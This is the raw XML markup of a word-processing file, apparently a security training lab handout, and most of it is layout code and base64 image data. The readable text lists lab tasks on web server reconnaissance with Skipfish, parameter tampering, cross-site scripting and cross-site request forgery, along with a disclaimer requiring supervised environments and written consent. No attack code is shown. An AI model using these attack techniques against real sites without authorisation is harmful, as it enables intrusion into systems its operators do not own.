AAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAqtjd48MAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;">
                  <v:imagedata r:id="rId17" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="230467CD" wp14:editId="7B0EE807">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1544612</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>974657</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3157618" cy="462057"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="3" name="image7.png" descr="CNA_largo-on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7.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3157618" cy="462057"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="3" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05E85C77" wp14:editId="3E3007E3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5405120</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>832976</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="539672" cy="607694"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="5" name="image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8.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="539672" cy="607694"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7620A2E0" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D15595E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17125DDE" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A7C4A6" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2FD438" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EED3FDD" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:b/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EB7BAC1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:spacing w:before="56"/>
        <w:ind w:right="1436"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2984642B" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D02F84">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1420" w:right="0" w:bottom="280" w:left="600" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5703883B" w14:textId="59C18454" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="9895"/>
        </w:tabs>
        <w:spacing w:before="82"/>
        <w:ind w:left="840"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15731712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53AB7451" wp14:editId="01880201">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="56" name="Line 4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01A5A4E" id="Line 41" o:spid="_x0000_s1026" style="position:absolute;z-index:157317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zAgzAEAAIQDAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L06COeiMOD0k6y7Z&#10;FqDdBzCSbAuTRUFSYufvR8lJum63YT4Iovj4SD7S68exN+ysfNBoa76YzTlTVqDUtq35j5enDw+c&#10;hQhWgkGran5RgT9u3r9bD65SS+zQSOUZkdhQDa7mXYyuKoogOtVDmKFTlpwN+h4imb4tpIeB2HtT&#10;LOfzVTGgl86jUCHQ625y8k3mbxol4vemCSoyU3OqLebT5/OYzmKzhqr14DotrmXAP1TRg7aU9E61&#10;gwjs5PVfVL0WHgM2cSawL7BptFC5B+pmMf+jm+cOnMq9kDjB3WUK/49WfDsfPNOy5uWKMws9zWiv&#10;rWIfF0mbwYWKIFt78Kk7Mdpnt0fxMzCL2w5sq3KNLxdHcTmieBOSjOAow3H4ipIwcIqYhRob3ydK&#10;koCNeR6X+zzUGJmgx9XDarUsS87EzVdAdQt0PsQvCnuWLjU3VHQmhvM+RCqdoDdIymPxSRuTx20s&#10;G2r+qVyWOSCg0TI5Eyz49rg1np0hLUz+kg5E9gaWmHcQugmXXdMqeTxZmbN0CuTn6z2CNtOdiIwl&#10;vpswk8RHlJeDT3nSO406Z7yuZdql3+2Mev15Nr8AAAD//wMAUEsDBBQABgAIAAAAIQCvCSOl3wAA&#10;AA4BAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT8MwDIXvSPyHyEhcpi3pKiZamk4I6I0LA7Rr1pi2&#10;onG6JtsKvx7vgODmZz89f69YT64XRxxD50lDslAgkGpvO2o0vL1W81sQIRqypveEGr4wwLq8vChM&#10;bv2JXvC4iY3gEAq50dDGOORShrpFZ8LCD0h8+/CjM5Hl2Eg7mhOHu14ulVpJZzriD60Z8KHF+nNz&#10;cBpC9Y776ntWz9Q2bTwu94/PT0br66vp/g5ExCn+meGMz+hQMtPOH8gG0bNWWcpWHm7SJANxtiSZ&#10;WoHY/e5kWcj/NcofAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsA&#10;AAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFJHMCDMAQAAhAMAAA4A&#10;AAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAK8JI6XfAAAADgEA&#10;AA8AAAAAAAAAAAAAAAAAJgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAyBQAAAAA=&#10;">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>What we</w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>do?</w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8E2BA1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:spacing w:before="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Set up (Refer to our previous lab and setup your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>lab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122CA46B" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:spacing w:before="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Webserver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-16"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AC6A0C" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3000"/>
        </w:tabs>
        <w:spacing w:before="121"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Task 1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Skipfish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526D2BA5" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:spacing w:before="111"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Webserver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41303840" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3000"/>
        </w:tabs>
        <w:spacing w:before="121"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Parameter Tampering and Cross-site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EACAE2" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3056"/>
        </w:tabs>
        <w:spacing w:before="109"/>
        <w:ind w:left="3055" w:hanging="416"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cross-site request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577645EC" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="9895"/>
        </w:tabs>
        <w:spacing w:before="120"/>
        <w:ind w:left="840"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F655875" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120"/>
        <w:ind w:left="840" w:right="1434"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>unsupervised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>environme</w:t>
      </w:r>
      <w:r>
        <w:t>nts/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>real</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>environments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Attempting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>certain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>real</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>environments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>proper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>written</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>consents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the owners of the network is punishable offense. All our labs are only for educational purposes and to be practiced under supervised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFF65A9" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EBC043" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143BA934" w14:textId="0A7C8A41" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3124"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15732224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="739A33FE" wp14:editId="3D9EA714">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2461895</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>12700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="567055" cy="250825"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="53" name="Group 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7055" cy="250825"/>
                          <a:chOff x="3877" y="20"/>
                          <a:chExt cx="893" cy="395"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="54" name="Picture 4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3877" y="20"/>
                            <a:ext cx="413" cy="3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5" name="Picture 3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4357" y="20"/>
                            <a:ext cx="413" cy="3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6186AD4A" id="Group 38" o:spid="_x0000_s1026" style="position:absolute;margin-left:193.85pt;margin-top:1pt;width:44.65pt;height:19.75pt;z-index:15732224;mso-position-horizontal-relative:page" coordorigin="3877,20" coordsize="893,3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&#10;tn2n